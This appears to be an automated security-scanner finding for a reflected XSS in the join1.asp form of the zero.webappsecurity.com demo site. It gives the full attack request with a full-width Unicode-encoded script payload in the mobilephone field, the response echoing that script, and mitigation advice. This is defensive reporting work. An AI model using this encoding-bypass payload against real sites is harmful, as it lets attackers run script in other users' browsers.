Cross-Site Scripting: Reflected - http://zero.webappsecurity.com:80/join1.asp?Name=%u0031%u0032%u0033%u0034%u0035&Surname=%u0031%u0032%u0033%u0034%u0035&email=%u004A%u006F%u0068%u006E%u002E%u0044%u006F%u0065%u0025%u0034%u0030%u0073%u006F%u006D%u0065%
Created by: armorcodegithubpreprod[bot]
Category: Cross-Site Scripting: Reflected Instance Id: b56113e9-172c-4690-904f-a0efa1d5c347 Vulnerability Id: 0c94d187-1e6e-46cd-b28e-4512ebd9e7cd Scan Type: Dynamic CheckType: Vulnerability Abstract: A Unicode conversion Cross-Site Scripting (XSS) vulnerability was found. This vulnerability is due to an input validation error in the filtration of special HTML characters supplied as Unicode characters. If exploited, an attacker could craft a malicious link containing arbitrary HTML or script code to be executed in a user's browser. Recommendations include modifying the web.config file to use only Unicode code page for output or filtering full-width ASCII characters from all non-trusted data sources. Request: GET /join1.asp?Name=%u0031%u0032%u0033%u0034%u0035&Surname=%u0031%u0032%u0033%u0034%u0035&email=%u004A%u006F%u0068%u006E%u002E%u0044%u006F%u0065%u0025%u0034%u0030%u0073%u006F%u006D%u0065%u0077%u0068%u0065%u0072%u0065%u002E%u0063%u006F%u006D&Password=%u0031%u0032%u0033%u0034%u0035&Confirm%20Password=%u0031%u0032%u0033%u0034%u0035&house=%u0031%u0032%u0033%u0034%u0035&street=%u0031%u0032%u0033%u0034%u0035&Address2=%u0031%u0032%u0033%u0034%u0035&town=%u0031%u0032%u0033%u0034%u0035&Postcode=%u0031%u0032%u0033%u0034%u0035&Country=%u0031%u0032%u0033%u0034%u0035&homephone=%u0037%u0037%u0030&mobilephone=%uFF1C%u0073%u0063%u0072%u0069%u0070%u0074%uFF1E%u0061%u006C%u0065%u0072%u0074%u0028%u0027%u0076%u0075%u006C%u006E%u0065%u0072%u0061%u0062%u0069%u006C%u0069%u0074%u0079%u0027%u0029%uFF1C%u002F%u0073%u0063%u0072%u0069%u0070%u0074%uFF1E HTTP/1.1 Referer: http://zero.webappsecurity.com:80/join.asp User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Accept: / Pragma: no-cache Host: zero.webappsecurity.com X-Scan-Memo: Category="Audit"; Function="createStateRequestFromAttackDefinition"; SID="21B879FA8CFD3E4B1175B97AD24EF2DA"; PSID="FAC63941855F0BDFDBEE807AB600B431"; SessionType="AuditAttack"; CrawlType="None"; AttackType="QueryParamManipulation"; OriginatingEngineID="e1b90d8a-7c62-4157-8be9-6c95d3c5f185"; AttackSequence="0"; AttackParamDesc="mobilephone"; AttackParamIndex="12"; AttackParamSubIndex="0"; CheckId="5172"; Engine="Asp+Net+Unicode+XSS"; Retry="False"; SmartMode="ServerSpecificOnly"; AttackString="%25uff1cscript%25uff1ealert('vulnerability')%25uff1c%2fscript%25uff1e"; ThreadId="25"; ThreadType="AuditDBReaderSessionDrivenAudit"; Connection: Keep-Alive Cookie: CustomCookie=WebInspect69383ZXB3FCEA2CCD6849B0A63D3EFF65615601Y3637;status=yes;username=;userid=;sessionid=;ASPSESSIONIDCARBTACT=NPEJMBECCJLDPDPFJFLLKNOJ;state=;passes3=;passes=;passes2=;Keyed=Var2=Second+Value&Var1=First+Value;Second=Oatmal+Chocolate;FirstCookie=Chocolate+Chip
Response:
Date: Fri, 13 May 2011 19:54:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4089
Content-Type: text/html
Set-Cookie: passes=; path=/
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Cache-control: private
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please supply a real e-mail address</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="John.Doe@somewhere.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="770"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="<script>alert('vulnerability')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
File Path: //zero.webappsecurity.com:0
Mitigation:
For Security Operations:
No patch is currently available.
Modify the web.config file to use only Unicode code page for output. To do this, add the following lines to your web.config file:
<configuration>
<system.web>
<globalization responseEncoding="utf-8" />
</system.web>
</configuration>
If you cannot use Unicode, have your developers to filter full-width ASCII characters from all non-trusted data sources, such as user input, HTTP headers, some components output, and other data.
For Developers:
Have your Security Operations modify the web.config file to use only Unicode code page for output.
If your application cannot use Unicode, you must filter full-width ASCII characters from all non-trusted data sources, such as user input, HTTP headers, some components output, and other data.
For QA:
For security reasons, it is important to test the web application not only from the perspective of a normal user, but also from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for security defects.
Attempt to craft a link using Unicode characters and containing arbitrary HTML or script code to be executed in a user's browser. If the application does not properly validate the Unicode characters, report your findings to your Security Operations and Developers.